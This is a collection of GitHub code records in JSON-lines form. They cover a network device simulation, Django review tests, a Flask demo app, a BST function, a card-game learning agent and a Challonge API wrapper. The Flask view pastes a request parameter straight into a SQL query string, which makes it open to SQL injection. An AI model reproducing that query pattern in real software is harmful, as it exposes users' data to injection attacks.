self.set_num(devices) # unique int from all the other devices\n\n\n\t\tself.sent_messages = [] # messages sent this time step\n\t\tself.message_dist = None\n\t\tself.ping_dist = None\n\t\tself.echo_dist = None\n\t\tself.most_recent_message_type = None\n\n\n\tdef main_loop(self, t, verbose=False):\n\n\t\tself.sent_messages, update_console_display = \\\n\t\t\tself.n.main_loop(t, verbose=verbose)\n\n\t\treturn self.sent_messages, update_console_display\n\n\tdef set_source_and_destination(self, devices):\n\n\t\t# pick a random side of the map to start the device at\n\t\tsides = ['left', 'right', 'top', 'bottom']\n\t\tsrc_side = random.choice(sides)\n\n\t\t# pick a random point on that side and start the device there\n\t\tsrc = None\n\t\twhile src == None:\n\t\t\tif src_side == 'left': src = (0, H * random.uniform(0, 1))\n\t\t\tif src_side == 'right': src = (W, H * random.uniform(0, 1))\n\t\t\tif src_side == 'top':\t src = (W * random.uniform(0, 1), H)\n\t\t\tif src_side == 'bottom': src = (W * random.uniform(0, 1), 0)\n\t\t\tfor d in devices:\n\t\t\t\tif d.n.x == src[0] and d.n.y == src[1]:\n\t\t\t\t\tsrc = None\n\t\t\t\t\tbreak\n\n\t\t# pick the opposite side for the dst\n\t\tif src_side == 'left': dst_side = 'right'\n\t\tif src_side == 'right': dst_side = 'left'\n\t\tif src_side == 'top':\t dst_side = 'bottom'\n\t\tif src_side == 'bottom': dst_side = 'top'\n\t\t# # pick a random other side\n\t\t# sides.remove(src_side)\n\t\t# dst_side = random.choice(sides)\n\n\t\t# pick a random point on that side and set the dst there\n\t\tif dst_side == 'left': dst = (0, H * random.uniform(0, 1))\n\t\tif dst_side == 'right': dst = (W, H * random.uniform(0, 1))\n\t\tif dst_side == 'top': dst = (W * random.uniform(0, 1), H)\n\t\tif dst_side == 'bottom': dst = (W * random.uniform(0, 1), 0)\n\n\t\treturn src, dst\n\n\tdef set_velocity(self):\n\t\tvel = random.gauss(AVG_VEL, STD_DEV_VEL) # normal distribution\n\t\tvel = MIN_VEL if vel < MIN_VEL else vel\n\t\tvel = MAX_VEL if vel > MAX_VEL else vel\n\t\treturn vel\n\n\tdef set_num(self, devices):\n\n\t\t# find minimum positive integer this device could have\n\t\tnum = 0\n\t\twhile num in list(map(lambda d : d.num, devices)):\n\t\t\tnum += 1\n\t\treturn num\n\n\tdef reached_dst(self):\n\t\tdst_dist = math.sqrt((self.n.x - self.dst[0])**2 + (self.n.y - self.dst[1])**2)\n\t\treturn dst_dist <= MAX_DST_DIST\n\n\tdef move(self, close_devices, verbose=False):\n\t\t# print('\\n\\n\\n')\n\t\tx, y = self.n.x, self.n.y\n\t\t# print('(x, y) = (%.4f, %.4f)' % (x, y))\n\t\t# print('self.dst = (%.4f, %.4f)' % (self.dst[0], self.dst[1]))\n\t\tdx, dy = self.dst[0]-x, self.dst[1]-y # x and y dist to dst\n\t\t# print('(dx, dy) = (%.4f, %.4f)' % (dx, dy))\n\t\tdst_dist = math.sqrt(dx**2 + dy**2) # distance to destination\n\t\ttheta0 = np.arctan2(dy, dx) # v0 = angle to dst\n\t\t# print('theta0 = %.4f' % theta0)\n\t\tmag = min(self.vel, dst_dist)\n\t\t# print('mag = min(self.vel, dst_dist) = min(%.4f, %.4f) = %.4f' % (self.vel, dst_dist, mag))\n\t\tv0 = (mag * np.cos(theta0), mag * np.sin(theta0)) # v0 = vector to destination\n\t\tv_sum = v0\n\t\t# print('v0\t= (%.4f, %.4f)' % (v_sum[0], v_sum[1]))\n\t\tfor d, dist in close_devices.items():\n\t\t\ttheta = np.arctan2(d.n.y-y, d.n.x-x) + np.pi\n\t\t\tmag = 0.0025 * float(1 / dist)\n\t\t\t# print('dist = %.4f mag = %.4f theta = %.4f' % (dist, mag, theta))\n\t\t\tv = (mag * np.cos(theta), mag * np.sin(theta)) # v0 = vector to destination\n\t\t\t# print('v = (%.4f, %4f)' % (v[0], v[1]))\n\t\t\tv_sum = (v_sum[0] + v[0], v_sum[1] + v[1])\n\t\tmag = math.sqrt(v_sum[0]**2 + v_sum[1]**2)\n\t\t# print('mag = %.4f' % mag)\n\t\tif mag > MAX_VEL:\n\t\t\ttheta = np.arctan2(v_sum[1], v_sum[0])\n\t\t\tv_sum = (MAX_VEL * np.cos(theta), MAX_VEL * np.sin(theta))\n\t\t# print('v_sum = (%.4f, %.4f)' % (v_sum[0], v_sum[1]))\n\t\tself.n.x += v_sum[0]\n\t\tself.n.y += v_sum[1]\n\t\tif self.n.x < 0: self.n.x = 0\n\t\tif self.n.x > W: self.n.x = W\n\t\tif self.n.y < 0: self.n.y = 0\n\t\tif self.n.y > W: self.n.y = H\n\t\treturn self.reached_dst()\n\n\tdef print_d(self, num_devices='?', i='?', start_space='\t', newline_start=False):\n\n\t\tself.n.print_n(num_nodes=num_devices, i=i, start_space=start_space, newline_start=newline_start)\n\n\n","repo_name":"LukeDickerson19/basic-network-simulation","sub_path":"src/device.py","file_name":"device.py","file_ext":"py","file_size_in_byte":5120,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"28136237256","text":"from django.test import TestCase\nfrom django.test import Client\nfrom django.urls import reverse\nfrom tests.factories.gbe_factories import (\n BioFactory,\n ClassFactory,\n ConferenceFactory,\n ProfileFactory,\n)\nfrom tests.factories.scheduler_factories import SchedEventFactory\nfrom tests.functions.gbe_functions import (\n grant_privilege,\n is_login_page,\n login_as,\n)\nfrom gbe.models import BidEvaluation\nfrom scheduler.models import Event as sEvent\n\n\nclass TestReviewClass(TestCase):\n '''Tests for review_class view'''\n view_name = 'class_review'\n\n @classmethod\n def setUpTestData(cls):\n cls.performer = BioFactory()\n cls.privileged_profile = ProfileFactory()\n cls.privileged_user = cls.privileged_profile.user_object\n grant_privilege(cls.privileged_user, 'Class Reviewers')\n grant_privilege(cls.privileged_user, 'Class Coordinator')\n\n def setUp(self):\n self.client = Client()\n\n def get_post_data(self, bid, reviewer=None):\n reviewer = reviewer or self.privileged_profile\n return {'vote': 3,\n 'notes': \"blah blah\",\n 'evaluator': reviewer.pk,\n 'bid': bid.pk}\n\n def test_review_class_all_well(self):\n klass = ClassFactory()\n url = reverse(self.view_name,\n args=[klass.pk],\n urlconf='gbe.urls')\n\n login_as(self.privileged_user, self)\n response = self.client.get(url)\n self.assertEqual(response.status_code, 200)\n self.assertContains(response, 'Review Class')\n self.assertContains(response, \"Class Proposal\")\n self.assertContains(response, \"Set Class State\")\n self.assertNotContains(response, 'name=\"extra_button\"')\n self.assertContains(response, self.performer.year_started)\n\n def test_review_class_w_scheduling(self):\n grant_privilege(self.privileged_user, 'Scheduling Mavens')\n klass = ClassFactory()\n url = reverse(self.view_name,\n args=[klass.pk],\n urlconf='gbe.urls')\n\n login_as(self.privileged_user, self)\n response = self.client.get(url)\n self.assertContains(response, 'name=\"extra_button\"')\n\n def test_review_class_post_form_invalid(self):\n klass = ClassFactory()\n url = reverse(self.view_name,\n args=[klass.pk],\n urlconf='gbe.urls')\n\n login_as(self.privileged_user, self)\n response = self.client.post(url,\n data={'accepted': 1})\n self.assertEqual(response.status_code, 200)\n self.assertContains(response, 'Review Class')\n\n def test_review_class_post_form_valid_creates_evaluation(self):\n klass = ClassFactory()\n url = reverse(self.view_name,\n args=[klass.pk],\n urlconf='gbe.urls')\n profile = self.privileged_user.profile\n pre_execute_count = BidEvaluation.objects.filter(\n evaluator=profile,\n bid=klass).count()\n login_as(self.privileged_user, self)\n data = self.get_post_data(klass)\n response = self.client.post(url,\n data,\n follow=True)\n self.assertEqual(response.status_code, 200)\n self.assertContains(response, 'Review Class')\n post_execute_count = BidEvaluation.objects.filter(\n evaluator=profile,\n bid=klass).count()\n assert post_execute_count == pre_execute_count + 1\n\n def test_review_class_valid_post_evaluation_has_correct_vote(self):\n klass = ClassFactory()\n url = reverse(self.view_name,\n args=[klass.pk],\n urlconf='gbe.urls')\n profile = self.privileged_user.profile\n login_as(self.privileged_user, self)\n data = self.get_post_data(klass)\n response = self.client.post(url,\n data,\n follow=True)\n self.assertEqual(response.status_code, 200)\n self.assertContains(response, 'Review Class')\n evaluation = BidEvaluation.objects.filter(\n evaluator=profile,\n bid=klass).last()\n assert evaluation.vote == data['vote']\n\n def test_review_class_past_conference(self):\n klass = ClassFactory()\n klass.b_conference.status = 'completed'\n klass.b_conference.save()\n url = reverse(self.view_name, args=[klass.pk], urlconf=\"gbe.urls\")\n login_as(self.privileged_user, self)\n response = self.client.get(url, follow=True)\n self.assertRedirects(\n response,\n reverse('class_view',\n urlconf='gbe.urls',\n args=[klass.pk]))\n self.assertContains(response, 'Review Class')\n self.assertNotContains(response, 'Review Information')\n\n def test_no_login_gives_error(self):\n url = reverse(self.view_name, args=[1], urlconf=\"gbe.urls\")\n response = self.client.get(url, follow=True)\n redirect_url = reverse('login') + \"?next=\" + url\n self.assertRedirects(response, redirect_url)\n self.assertTrue(is_login_page(response))\n\n def test_basic_user(self):\n klass = ClassFactory()\n reviewer = ProfileFactory()\n grant_privilege(reviewer, 'Class Reviewers')\n login_as(reviewer, self)\n url = reverse(self.view_name, args=[klass.pk], urlconf=\"gbe.urls\")\n response = self.client.get(url)\n self.assertContains(response, \"Class Proposal\")\n assert response.status_code == 200\n\n def test_review_class_no_how_heard(self):\n klass = ClassFactory()\n klass.teacher_bio.contact.how_heard = '[]'\n klass.teacher_bio.contact.save()\n url = reverse(self.view_name,\n args=[klass.pk],\n urlconf='gbe.urls')\n\n login_as(self.privileged_user, self)\n response = self.client.get(url)\n self.assertNotContains(response, '[]')\n self.assertContains(response, \"The Presenter\")\n\n def test_review_class_how_heard_is_present(self):\n klass = ClassFactory()\n klass.teacher_bio.contact.how_heard = \"[u'Facebook']\"\n klass.teacher_bio.contact.save()\n url = reverse(self.view_name,\n args=[klass.pk],\n urlconf='gbe.urls')\n\n login_as(self.privileged_user, self)\n response = self.client.get(url)\n self.assertContains(response, 'Facebook')\n","repo_name":"bethlakshmi/gbe-divio-djangocms-python2.7","sub_path":"tests/gbe/test_review_class.py","file_name":"test_review_class.py","file_ext":"py","file_size_in_byte":6590,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"76"} +{"seq_id":"28776831031","text":"from flask import render_template\nfrom flask import request\nfrom flaskexample import app\nfrom sqlalchemy import create_engine\nfrom sqlalchemy_utils import database_exists, create_database\nimport pandas as pd\nimport psycopg2\n\n\nfrom utilTy import find_best_data\nfrom a_Model import ModelIt\n\nuser = 'tyyano' #add your username here (same as previous postgreSQL)\n\nhost = 'localhost'\ndbname = 'demo2_db'\ndb = create_engine('postgres://%s%s/%s'%(user,host,dbname))\ncon = None\ncon = psycopg2.connect(database = dbname, user = user)\n\n\n@app.route('/')\n@app.route('/index')\ndef index():\n user = { 'nickname': 'Twtytee' } # fake user\n return render_template(\"index.html\", title = 'Home', user = user) \n\n\n@app.route('/mock')\ndef mock():\n return render_template(\"mock.html\") \n\n@app.route('/inputfuncy')\ndef funcy_input():\n return render_template(\"inputfuncy.html\")\n\n@app.route('/outputfuncy')\ndef funcy_output():\n\t#pull 'issue' from input field and store it\n\tissue_val = request.args.get('issue')\n\t#select ---- from the ---- dtabase for --- the user inputs\n\tif issue_val == \"Any Issues\":\n\t\tquery = \"SELECT index, created_at, handle,twt_url, text_std, log_odds, lc FROM demo_data_table WHERE likely='LIKELY'\"\n\telse:\n\t\tquery = \"SELECT index, created_at, handle,twt_url, text_std, log_odds, lc FROM demo_data_table WHERE likely='LIKELY' AND issue='%s'\" % issue_val \n\tprint(query)\n\tquery_results=pd.read_sql_query(query,con)\n\t#print(query_results)\n\tliberal = []\n\tconserv = []\n\tbirths = []\n\tbirths_refined = []\n\n\t# order by the date \n\tfor i in range(0,query_results.shape[0]):\n\t\tdateStrOrg = query_results.iloc[i]['created_at']\n\t\tdateStr = query_results.iloc[i]['created_at'].split()[0]\n\t\tdateStr = ''.join(dateStr.split('-'))\n\t\tdateInt = int(dateStr)\n\t\thandleStr = query_results.iloc[i]['handle']\n\t\ttwt_url_str = query_results.iloc[i]['twt_url']\n\t\tlc_str = query_results.iloc[i]['lc']\n\t\tidx_str = query_results.iloc[i]['index']\n\t\tlog_odds_str = query_results.iloc[i]['log_odds']\n\t\tlog_odds_float = float(query_results.iloc[i]['log_odds'])\n\t\ttxt_str =query_results.iloc[i]['text_std']\n\n\t\tcolor = \"blue\"\n\t\tif lc_str == 'Conservative':\n\t\t\tcolor = \"red\"\n\n\t\tif (lc_str =='Liberal'):\n\t\t\tliberal.append((idx_str, log_odds_float, dateInt))\n\t\telse:\n\t\t\tconserv.append((idx_str, log_odds_float, dateInt))\n\t\tbirths.append(dict(index=idx_str, created_at=dateStrOrg, handle=handleStr, twt_url=twt_url_str, \\\n\t\t\ttext_std=txt_str, log_odds=log_odds_str, lc=lc_str, color=color))\n\n\t#sort the tuple by date and log odds value \n\tliberal_idx = find_best_data(liberal, 7)\n\tconserv_idx = find_best_data(conserv, 7)\n\n\t# return only equal number of liberal and conservative;\n\t# odds number is liberal, even number is conservative\n\tlimit = min(len(liberal_idx), len(conserv_idx))\n\tliberal_idx = liberal_idx[:limit]\n\tconserv_idx = conserv_idx[:limit]\n\n\tbirth_liberal = []\n\tbirth_conserv = []\n\tfor x in births:\n\t\tif x['index'] in liberal_idx:\n\t\t\tbirth_liberal.append(x)\n\t\telif x['index'] in conserv_idx: \n\t\t\tbirth_conserv.append(x)\n\n\tfor i in range(limit):\n\t\tbirths_refined.append((birth_liberal[i], birth_conserv[i]))\n\n\tthe_result = ModelIt(issue_val,births)\n\n\treturn render_template(\"outputfuncy.html\", births = births_refined, the_result = the_result, inputVal = issue_val)\n","repo_name":"twtytee/twtytee.github.io","sub_path":"TY_demo/flaskexample/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3243,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"2800256993","text":"# 이진 탐색 트리 노드 간 최소 거리\n\ndef minDiffInBST(root):\n prev = - int(1e9)\n result = int(1e9)\n\n stack = []\n node = root\n\n while stack or node:\n while node:\n stack.append(node)\n node = node.left\n\n node = stack.pop()\n result = min(result, node.val - prev)\n prev = node.val\n\n node = node.right","repo_name":"minsoo9506/computer-science-study","sub_path":"[Data Structure] python algorithm interview/Chap14 트리/53.py","file_name":"53.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"17443925734","text":"import csv\nimport os\nimport json\nimport random\nfrom pprint import pprint\nfrom Bot import Bot\nfrom importSVM import import_model\nimport sys\n\nclass LearningAgent(Bot):\n\n def __init__(self):\n self.combinations = dict()\n self.preferences = list()\n self.lookup_table = dict()\n self.card_features = dict()\n self.global_order = dict()\n\n #Processing DataSet\n def select_card(self, black_card, *white_cards):\n\n better_card = 0\n better_position = -sys.maxsize - 1\n\n for white_card in list(white_cards):\n #Get the combo key and look into the translation\n combo_id = self.lookup_table[self.__generate_combo_key(black_card, white_card)]\n combo_features = self.combinations[combo_id]\n print(combo_features)\n #TODO: Know what is in the keys in global order\n\n combo_position = self.global_order[combo_features]\n if(combo_position < better_position):\n better_card = white_card\n better_position = combo_position\n\n return better_card\n\n def __get_card_features(self, card_key):\n return self.card_features[card_key]\n\n def learn_from_model(self, rank_svm_model):\n #Import from Phil Lopes code\n self.global_order = import_model(rank_svm_model,'all_data.csv') #this should be assigned to a variable\n\n def process_and_save_data(self, data_path, cards_path, combination_path, preference_path):\n comb, pref, lookup, card_features = self.__process_data(data_path, cards_path)\n\n # Print some info for testing\n print('number of combinations: ' + str(len(comb)))\n print('number of pref: ' + str(len(pref)))\n print('number of distinct preferences: ' + str(len(set(pref))))\n\n # Create combinations file\n with open(combination_path, 'w') as f:\n id, card = random.choice(list(card_features.items()))\n black_features_name = ['b_{0}'.format(i) for i in card.keys()]\n white_features_name = ['w_{0}'.format(i) for i in card.keys()]\n f.write(\"{0},{1},{2}\\n\".format('ID', ','.join(black_features_name), ','.join(white_features_name)))\n for key, value in comb.items():\n feature_string = \",\".join(map(str, value))\n f.write(\"{0},{1}\\n\".format(key, feature_string))\n\n # Create preference file\n with open(preference_path, 'w') as f:\n for pref in pref:\n f.write(\"{0}\\n\".format(pref))\n\n def __generate_combo_key(self, black, white):\n return black + ' ' + white\n\n def __process_data(self, data_path, cards_path):\n\n #Get the cards features\n with open(cards_path, 'r') as card_file:\n\n card_data = json.load(card_file)\n for id, card in card_data['blackCards'].items():\n self.card_features[id] = card[\"features\"]\n\n for id, card in card_data['whiteCards'].items():\n self.card_features[id] = card[\"features\"]\n\n #Create all possible combinations\n with open(cards_path, 'r') as card_file:\n card_data = json.load(card_file)\n\n #Update lookup table and combination\n lookup_table_id = 0\n for b_id, b_card in card_data['blackCards'].items():\n for w_id, w_card in card_data['whiteCards'].items():\n\n #Create lookup entry\n combined_card_name = self.__generate_combo_key(b_id, w_id)\n self.lookup_table[combined_card_name] = lookup_table_id\n lookup_table_id += 1\n\n #Create the combination feature\n combined_features = list(self.card_features[b_id].values()) + list(self.card_features[w_id].values())\n self.combinations[self.lookup_table[combined_card_name]] = combined_features\n\n #Process the playing hands\n with open(data_path, 'r') as csv_file:\n csv_stream = csv.reader(csv_file, delimiter =',')\n\n n_row = 0\n\n for row in csv_stream:\n if n_row == 0:\n #This is a header\n print('THIS IS A HEADER')\n else:\n black_card = row[2]\n best_white_card = row[3]\n worst_white_card = row[4]\n\n best_card_key = self.__generate_combo_key(black_card, best_white_card)\n worst_card_key = self.__generate_combo_key(black_card, worst_white_card)\n\n best_card_combo_id = self.lookup_table[best_card_key]\n worst_card_combo_id = self.lookup_table[worst_card_key]\n self.preferences.append(str(best_card_combo_id) + ',' + str(worst_card_combo_id))\n\n n_row += 1\n\n return self.combinations, self.preferences, self.lookup_table, self.card_features\n","repo_name":"GameAISchool2018members/bah","sub_path":"LearningAgent.py","file_name":"LearningAgent.py","file_ext":"py","file_size_in_byte":4921,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"22847936601","text":"import requests\nimport re\nfrom urllib.parse import urlencode\nimport datetime\n\nfrom tournament import Tournament\nfrom _data_management import _prepare_params\nfrom _enums import TournamentType, TournamentRankedBy, TournamentGrandFinalModifier\nfrom _errors import *\n\n\nBASE_LINK = \"https://api.challonge.com/v1/\"\n\n\n# A wrapper for all tournament related API calls.\nclass Tournaments:\n def __init__(self, auth_info):\n self.auth_info = auth_info\n self.base_link = BASE_LINK\n\n # Retrieves all tournaments visible to an account.\n def get_all(self, state = None, tournament_type = None, created_after = None, created_before = None, subdomain = None):\n req_url = self.base_link + f\"tournaments.json\"\n\n data = {}\n\n if state:\n if not isinstance(state, TournamentState):\n try:\n state = TournamentState(state)\n except:\n raise BadArgument(f\"Parameter `state` is invalid, valid Types: {', '.join(['`{}`'.format(i.value) for i in list(TournamentState)])}\")\n\n data['state'] = state.name\n\n if tournament_type:\n if not isinstance(tournament_type, TournamentType):\n try:\n tournament_type = TournamentType(tournament_type)\n except:\n raise BadArgument(f\"Parameter `tournament_type` is invalid, valid Types: {', '.join(['`{}`'.format(i.value) for i in list(TournamentType)])}\")\n\n data['state'] = state.name\n\n if created_after:\n if isinstance(created_after, datetime.datetime):\n created_after = created_after.strftime('%Y-%m-%d')\n else:\n try:\n datetime.datetime.strptime(created_after, '%Y-%m-%d')\n created_after = created_after.strftime('%Y-%m-%d')\n except:\n raise BadArgument(f\"Parameter `created_after` must be a `datetime.datetime` object or a string in the format `YYYY-MM-DD`\")\n data['created_after'] = created_after\n\n if created_before:\n if isinstance(created_before, datetime.datetime):\n created_before = created_before.strftime('%Y-%m-%d')\n else:\n try:\n datetime.datetime.strptime(created_before, '%Y-%m-%d')\n created_before = created_before.strftime('%Y-%m-%d')\n except:\n raise BadArgument(f\"Parameter `created_before` must be a `datetime.datetime` object or a string in the format `YYYY-MM-DD`\")\n data['created_before'] = created_before\n\n if subdomain:\n if not isinstance(subdomain, str):\n raise BadArgument(f\"Parameter `subdomain` must be of type str\")\n if len(subdomain) > 60:\n raise BadArgument('Parameter `subdomain` cannot be more than 60 characters')\n patterns = '^[a-zA-Z0-9_]*$'\n if not re.search(patterns, subdomain):\n raise BadArgument('Parameter `subdomain` can only be letters, numbers, and underscores')\n data['subdomain'] = subdomain\n\n url_params = \"\"\n if len(data.keys()) > 0:\n url_params = \"?\" + urlencode(_prepare_params(data))\n\n req = requests.get(req_url, auth = self.auth_info)\n if not req.status_code == 200:\n raise HTTPException(req.status_code)\n else:\n return [Tournament(tournament_data, self.base_link, self.auth_info) for tournament_data in req.json()]\n\n # Retrieves a specific tournament by ID\n def get(self, id, include_participants = False, include_matches = False):\n req_url = self.base_link + f\"tournaments/{id}.json\"\n\n data = {\n \"include_participants\": int(include_participants),\n \"include_matches\": int(include_matches)\n }\n\n url_params = '?' + urlencode(_prepare_params(data))\n\n req = requests.get(req_url + url_params, auth = self.auth_info)\n if not req.status_code == 200:\n raise HTTPException(req.status_code)\n else:\n return Tournament(req.json(), self.base_link, self.auth_info)\n\n # Create a tournament.\n def create(self, name, url, tournament_type = TournamentType('single elimination'),\n subdomain = None, description = None, open_signup = None, hold_third_place_match = None,\n pts_for_match_win = None, pts_for_match_tie = None, pts_for_game_win = None, pts_for_game_tie = None,\n swiss_rounds = None, pts_for_bye = None, ranked_by = None, rr_pts_for_match_win = None,\n rr_pts_for_match_tie = None, rr_pts_for_game_win = None, rr_pts_for_game_tie = None,\n accept_attachments = None, hide_forum = None, show_rounds = None, private = None,\n notify_users_when_matches_open = None, notify_users_when_the_tournament_ends = None,\n sequential_pairings = None, signup_cap = None, start_at = None, check_in_duration = None,\n grand_finals_modifier = None):\n req_url = self.base_link + \"tournaments.json\"\n\n data = {}\n\n if not isinstance(name, str):\n raise BadArgument('Parameter `name` must be of type str')\n if len(name) > 60:\n raise BadArgument('Parameter `name` cannot be more than 60 characters')\n data['name'] = name\n\n if not isinstance(url, str):\n raise BadArgument('Parameter `url` must be of type str')\n if len(url) > 60:\n raise BadArgument('Parameter `url` cannot be more than 60 characters')\n patterns = '^[a-zA-Z0-9_]*$'\n if not re.search(patterns, url):\n raise BadArgument('Parameter `url` can only be letters, numbers, and underscores')\n data['url'] = url\n\n if not isinstance(tournament_type, TournamentType):\n try:\n tournament_type = TournamentType(tournament_type)\n except:\n raise BadArgument(f\"Parameter `tournament_type` is invalid, valid Types: {', '.join(['`{}`'.format(i.value) for i in list(TournamentType)])}\")\n data['tournament_type'] = tournament_type\n\n if subdomain is not None:\n patterns = '^[a-zA-Z0-9_]*$'\n if not re.search(patterns, subdomain):\n raise BadArgument('Parameter `subdomain` can only be letters, numbers, and underscores')\n else:\n data['subdomain'] = subdomain\n\n if description is not None:\n if not isinstance(description, str):\n raise BadArgument('Parameter `description` must be of type str')\n else:\n data['description'] = description\n\n if open_signup is not None:\n if not isinstance(open_signup, bool):\n raise BadArgument('Parameter `open_signup` must be of type bool')\n else:\n data['open_signup'] = open_signup\n\n if hold_third_place_match is not None:\n if not isinstance(hold_third_place_match, bool):\n raise BadArgument('Parameter `hold_third_place_match` must be of type bool')\n else:\n data['hold_third_place_match'] = hold_third_place_match\n\n if pts_for_match_win is not None:\n if not (isinstance(pts_for_match_win, int) or isinstance(pts_for_match_win, float)):\n raise BadArgument('Parameter `hold_third_place_match` must be of type int or float')\n else:\n pts_for_match_win = round(float(pts_for_match_win), 1)\n data['pts_for_match_win'] = pts_for_match_win\n\n if pts_for_match_tie is not None:\n if not (isinstance(pts_for_match_tie, int) or isinstance(pts_for_match_tie, float)):\n raise BadArgument('Parameter `hold_third_place_match` must be of type int or float')\n else:\n pts_for_match_tie = round(float(pts_for_match_tie), 1)\n data['pts_for_match_tie'] = pts_for_match_tie\n\n if pts_for_game_win is not None:\n if not (isinstance(pts_for_game_win, int) or isinstance(pts_for_game_win, float)):\n raise BadArgument('Parameter `hold_third_place_match` must be of type int or float')\n else:\n pts_for_game_win = round(float(pts_for_game_win), 1)\n data['pts_for_game_win'] = pts_for_game_win\n\n if pts_for_game_tie is not None:\n if not (isinstance(pts_for_game_tie, int) or isinstance(pts_for_game_tie, float)):\n raise BadArgument('Parameter `hold_third_place_match` must be of type int or float')\n else:\n pts_for_game_tie = round(float(pts_for_game_tie), 1)\n data['pts_for_game_tie'] = pts_for_game_tie\n\n if rr_pts_for_match_win is not None:\n if not (isinstance(rr_pts_for_match_win, int) or isinstance(rr_pts_for_match_win, float)):\n raise BadArgument('Parameter `hold_third_place_match` must be of type int or float')\n else:\n rr_pts_for_match_win = round(float(rr_pts_for_match_win), 1)\n data['rr_pts_for_match_win'] = rr_pts_for_match_win\n\n if rr_pts_for_match_tie is not None:\n if not (isinstance(rr_pts_for_match_tie, int) or isinstance(rr_pts_for_match_tie, float)):\n raise BadArgument('Parameter `hold_third_place_match` must be of type int or float')\n else:\n rr_pts_for_match_tie = round(float(rr_pts_for_match_tie), 1)\n data['rr_pts_for_match_tie'] = rr_pts_for_match_tie\n\n if rr_pts_for_game_win is not None:\n if not (isinstance(rr_pts_for_game_win, int) or isinstance(rr_pts_for_game_win, float)):\n raise BadArgument('Parameter `hold_third_place_match` must be of type int or float')\n else:\n rr_pts_for_game_win = round(float(rr_pts_for_game_win), 1)\n data['rr_pts_for_game_win'] = rr_pts_for_game_win\n\n if rr_pts_for_game_tie is not None:\n if not (isinstance(rr_pts_for_game_tie, int) or isinstance(rr_pts_for_game_tie, float)):\n raise BadArgument('Parameter `hold_third_place_match` must be of type int or float')\n else:\n rr_pts_for_game_tie = round(float(rr_pts_for_game_tie), 1)\n data['rr_pts_for_game_tie'] = rr_pts_for_game_tie\n\n if pts_for_bye is not None:\n if not (isinstance(pts_for_bye, int) or isinstance(pts_for_bye, float)):\n raise BadArgument('Parameter `pts_for_bye` must be of type int or float')\n else:\n pts_for_bye = round(float(pts_for_bye), 1)\n data['pts_for_bye'] = pts_for_bye\n\n if swiss_rounds is not None:\n if not isinstance(swiss_rounds, int):\n raise BadArgument('Parameter `swiss_rounds` must be of type int')\n else:\n data['swiss_rounds'] = swiss_rounds\n\n if ranked_by is not None:\n if not isinstance(ranked_by, TournamentRankedBy):\n try:\n ranked_by = TournamentRankedBy(ranked_by)\n except:\n raise BadArgument(f\"Parameter `ranked_by` is invalid, valid Types: {', '.join(['`{}`'.format(i.value) for i in list(TournamentRankedBy)])}\")\n else:\n data['ranked_by'] = ranked_by\n else:\n data['ranked_by'] = ranked_by\n\n if accept_attachments is not None:\n if not isinstance(accept_attachments, bool):\n raise BadArgument('Parameter `accept_attachments` must be of type bool')\n else:\n data['accept_attachments'] = accept_attachments\n\n if hide_forum is not None:\n if not isinstance(hide_forum, bool):\n raise BadArgument('Parameter `hide_forum` must be of type bool')\n else:\n data['hide_forum'] = hide_forum\n\n if show_rounds is not None:\n if not isinstance(show_rounds, bool):\n raise BadArgument('Parameter `show_rounds` must be of type bool')\n else:\n data['show_rounds'] = show_rounds\n\n if private is not None:\n if not isinstance(private, bool):\n raise BadArgument('Parameter `private` must be of type bool')\n else:\n data['private'] = private\n\n if notify_users_when_matches_open is not None:\n if not isinstance(notify_users_when_matches_open, bool):\n raise BadArgument('Parameter `notify_users_when_matches_open` must be of type bool')\n else:\n data['notify_users_when_matches_open'] = notify_users_when_matches_open\n\n if notify_users_when_the_tournament_ends is not None:\n if not isinstance(notify_users_when_the_tournament_ends, bool):\n raise BadArgument('Parameter `notify_users_when_the_tournament_ends` must be of type bool')\n else:\n data['notify_users_when_the_tournament_ends'] = notify_users_when_the_tournament_ends\n\n if sequential_pairings is not None:\n if not isinstance(sequential_pairings, bool):\n raise BadArgument('Parameter `sequential_pairings` must be of type bool')\n else:\n data['sequential_pairings'] = sequential_pairings\n\n if signup_cap is not None:\n if isinstance(signup_cap, int):\n raise BadArgument('Parameter `signup_cap` must be of type int')\n elif signup_cap > 256 or signup_cap < 1:\n raise BadArgument('Parameter `signup_cap` must be between the values 1 and 256')\n else:\n data['signup_cap'] = signup_cap\n\n if check_in_duration is not None:\n if not isinstance(check_in_duration, int):\n raise BadArgument('Parameter `check_in_duration` must be of type int')\n else:\n data['check_in_duration'] = check_in_duration\n\n if grand_finals_modifier is not None:\n if not isinstance(grand_finals_modifier, TournamentGrandFinalModifier):\n try:\n grand_finals_modifier = TournamentGrandFinalModifier(grand_finals_modifier)\n except:\n raise BadArgument(f\"Parameter `grand_finals_modifier` is invalid, valid Types: {', '.join(['`{}`'.format(i.value) for i in list(TournamentGrandFinalModifier)])}\")\n else:\n data['grand_finals_modifier'] = grand_finals_modifier\n else:\n data['grand_finals_modifier'] = grand_finals_modifier\n\n\n url_params = '?' + urlencode(_prepare_params(data, 'tournament'))\n\n req = requests.post(req_url + url_params, auth = self.auth_info)\n if not req.status_code == 200:\n try:\n errors = req.json()\n raise HTTPException(f\"{req.status_code} - {errors['errors'][0]}\")\n except:\n raise HTTPException(req.status_code)\n else:\n return Tournament(req.json(), self.base_link, self.auth_info)\n\n# An ovararching Challonge account object.\nclass Challonge:\n def __init__(self, username, api_key):\n self.auth_info = (username, api_key)\n self.base_link = BASE_LINK\n self.tournaments = Tournaments(self.auth_info)\n","repo_name":"Aryathel/ChallongePY","sub_path":"challonge.py","file_name":"challonge.py","file_ext":"py","file_size_in_byte":15405,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"18174771688","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun May 16 18:02:05 2021\r\n\r\n@author: udayd\r\n\"\"\"\r\n\r\nimport streamlit as st\r\nimport cv2\r\nimport numpy as np\r\nimport time\r\nimport matplotlib.pyplot as plt\r\nfrom PIL import 